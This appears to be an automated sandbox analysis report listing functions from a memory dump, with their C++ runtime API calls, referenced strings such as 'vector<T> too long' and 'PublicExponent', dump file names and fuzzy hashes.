Function 6CE24620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE24636

Part of subcall function 6CE89125: std::exception::exception.LIBCMT ref: 6CE8913A
Part of subcall function 6CE89125: __CxxThrowException@8.LIBCMT ref: 6CE8914F
Part of subcall function 6CE89125: std::exception::exception.LIBCMT ref: 6CE89160

_memmove.LIBCMT ref: 6CE2466F

Strings

invalid string position, xrefs: 6CE24631

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: ea585b397cdacca83ef45055d75e9905b9fc117a98c670a69ccf93272d180ce1
Instruction ID: 2f78e650e197879e64a07610631ddaa7d2f0f9c686b254298fdd17543a65433e
Opcode Fuzzy Hash: ea585b397cdacca83ef45055d75e9905b9fc117a98c670a69ccf93272d180ce1
Instruction Fuzzy Hash: 1B01DB313042405BD320CE9CDC80F5AB7B6EBD1714B34492ED195CBF05D6B5DC4283A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE459D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE45A55

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE45A6A

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE45A63

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 757275642-3271211234
Opcode ID: c8c1ddaed5c0bec9f2cc41cd5b5541e4e793afdfb70f525420097a293487574e
Instruction ID: 047424cb50ea330aa9224014d16d37b7b43e4b5a65d6da41fa7a05c5064b2d1e
Opcode Fuzzy Hash: c8c1ddaed5c0bec9f2cc41cd5b5541e4e793afdfb70f525420097a293487574e
Instruction Fuzzy Hash: 45111CB59013089FCB04CF99D881AAEF7F4BF48704F20855ED9199B751D770EA04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE459A6
__CxxThrowException@8.LIBCMT ref: 6CE459BB

Strings

0Bl, xrefs: 6CE459B4

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: c45913ac3a4d193e6ba31b8483a83261798d8307fe7543210f3394fab33526c7
Instruction ID: e14caaba84dcd006256b700fa0a5b4b0222583545e3091f3279aa4a867c66d55
Opcode Fuzzy Hash: c45913ac3a4d193e6ba31b8483a83261798d8307fe7543210f3394fab33526c7
Instruction Fuzzy Hash: 6BF03172901108ABDF04DF99D841ADEB7B8FB59314F508469EE18AB790DB70A70DCBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4DBC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4DC16
__CxxThrowException@8.LIBCMT ref: 6CE4DC2B

Strings

0Bl, xrefs: 6CE4DC24

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: f8c443a812d5c67fa42374b16eeb10723a8491d8a7c557d6b4b1b1ab385e560c
Instruction ID: d2976cbe62082db56ec86d047ad3246a381b47c43aa4abfdc19f793a97f14b19
Opcode Fuzzy Hash: f8c443a812d5c67fa42374b16eeb10723a8491d8a7c557d6b4b1b1ab385e560c
Instruction Fuzzy Hash: 3CF01D76900108ABDF04DF99D841ADEB7B8FB59304F508469EA18AB690DB70A709CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5ACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CE5ACF8

Strings

PublicExponent, xrefs: 6CE5AD1F
Modulus, xrefs: 6CE5AD30

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: ae6326688f867ed98ad8052d1117931869aad80f384ed0e0409befd6968b3438
Instruction ID: 4eca33076391d31d8e43be7db79bf2bf397050d42d1ec0f79782930249f48727
Opcode Fuzzy Hash: ae6326688f867ed98ad8052d1117931869aad80f384ed0e0409befd6968b3438
Instruction Fuzzy Hash: 471101719053009FC200DF7889414ABBBF0AFD6248FA0465EF4805BB20DB329849CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7B7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CE7B848

Strings

PublicExponent, xrefs: 6CE7B86F
Modulus, xrefs: 6CE7B880

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: 1458f8fa8edcbc7e2cf018eb69eba155fa9ed4106443ff266052312a409eaf66
Instruction ID: e907b5c483ef3ee14547fd5bcbf88121d5ae28734e2dc98d2653689a4c6bc187
Opcode Fuzzy Hash: 1458f8fa8edcbc7e2cf018eb69eba155fa9ed4106443ff266052312a409eaf66
Instruction Fuzzy Hash: F711E3719053449EC700DF6C894158BFBF4AFD6248F20066EF8845BB50DB35D84DCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6CE58E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6CE8ADFC: __aligned_offset_malloc.LIBCMT ref: 6CE8AE09

Part of subcall function 6CE891F6: std::_Lockit::_Lockit.LIBCPMT ref: 6CE89202

std::exception::exception.LIBCMT ref: 6CE58E98
__CxxThrowException@8.LIBCMT ref: 6CE58EAF

Strings

0Bl, xrefs: 6CE58EA7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8LockitLockit::_Throw__aligned_offset_mallocstd::_std::exception::exception
String ID: 0Bl
API String ID: 2477145047-3271211234
Opcode ID: 8ce42968378d0ae9527af309d2f9eb1b9bb0c8aacbd406929a1d409ab5a0727b
Instruction ID: 7b779e1b4ccf67f642634cd4bcdef8280c5626f7b9af31c60e0751273b4ffd0c
Opcode Fuzzy Hash: 8ce42968378d0ae9527af309d2f9eb1b9bb0c8aacbd406929a1d409ab5a0727b
Instruction Fuzzy Hash: C7F0F6329863142BD210DB555C42BEF32B89F80A1CF64091DF95899B81EB72912E85B3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5B5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE5B605

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

_memmove.LIBCMT ref: 6CE5B634

Strings

vector<T> too long, xrefs: 6CE5B600

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 47bbe75599fa5aa4ba82b1b7fd52874f049f00b9fc777065465d7e9cdfa11689
Instruction ID: 5aa908007521180cadfa3cd2bd7433929f355bf3618ce52e47e196ee6d210288
Opcode Fuzzy Hash: 47bbe75599fa5aa4ba82b1b7fd52874f049f00b9fc777065465d7e9cdfa11689
Instruction Fuzzy Hash: CE01D4B2A012059FC324CEA8DC80CA7B3F8EB542147244A2DE89BD3B90E771F8048B60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE527B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE527FA
__CxxThrowException@8.LIBCMT ref: 6CE5280F

Strings

0Bl, xrefs: 6CE52808

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: d7a645932c2e31fc508dce339809bd328eff93844d9c8873d522326b68220949
Instruction ID: 0ff4b4f2c1eddf9b81742d0377a7abd3ea9a9577f1d1b59f1546177103d6e704
Opcode Fuzzy Hash: d7a645932c2e31fc508dce339809bd328eff93844d9c8873d522326b68220949
Instruction Fuzzy Hash: AE0181759012049FC708CF58D9508AAB7F5FF98304B34C5ADC81E47B51DB31EA15CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE84230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE84241

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

_memmove.LIBCMT ref: 6CE84277

Strings

vector<bool> too long, xrefs: 6CE8423C

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<bool> too long
API String ID: 1785806476-842332957
Opcode ID: 9ee4611ce170aae8119c6d22a6036f9582107b9b5604c8fbe66d4f2efd898386
Instruction ID: b898eb83da9dfb603b1ffc0783ad10350429a9ffc3292597e27419020673881c
Opcode Fuzzy Hash: 9ee4611ce170aae8119c6d22a6036f9582107b9b5604c8fbe66d4f2efd898386
Instruction Fuzzy Hash: 4B01D472A051055FD714CFA9DCA08AEB3BDFB84358F61432FE51A87B44E730E909C690

Uniqueness

Uniqueness Score: -1.00%

Function 6CE83840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE83855

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

_memmove.LIBCMT ref: 6CE83880

Strings

vector<T> too long, xrefs: 6CE83850

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 9893c09dfe2477adde571b94f54318ef05fc7db27d6ff4bc758fb583a7d654ab
Instruction ID: ac28a1fedc7f2358887ac9a7f71324b3fe51878e4131b9930578227594dd5c82
Opcode Fuzzy Hash: 9893c09dfe2477adde571b94f54318ef05fc7db27d6ff4bc758fb583a7d654ab
Instruction Fuzzy Hash: A00171B15016099FD314DFA9D9848AAB3F8AB442147604A3DE5AED3B90EA74F8048B60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE45CC8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE45CDD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE45CD6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 0aae400a93c439a86e1e5a79daf96618a9ad7fd4d155b9ee64733cb936f797c7
Instruction ID: fc356ea1558bce86b1f30ce7248520d64405bd858102dd68723f483d234b38e8
Opcode Fuzzy Hash: 0aae400a93c439a86e1e5a79daf96618a9ad7fd4d155b9ee64733cb936f797c7
Instruction Fuzzy Hash: 3F011AB59017049FC318DF59D541D8ABBF4BF58314B21C6AED8499BB61EB30EA04CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4DEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4DF18

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE4DF2D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE4DF26

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 2741bb7be5127512a9fd659390da0778513349f5f5e842e37aaf7a1c77c14706
Instruction ID: 93676d5ec346dacfd624d3634c122a37e23f49880bab7e2293def82a3a0c8c7e
Opcode Fuzzy Hash: 2741bb7be5127512a9fd659390da0778513349f5f5e842e37aaf7a1c77c14706
Instruction Fuzzy Hash: C30148B59107049FC318CF49D541886BBF4EF58300B21C2AED8499BB21E730EA04CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE45C48

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE45C5D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE45C56

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
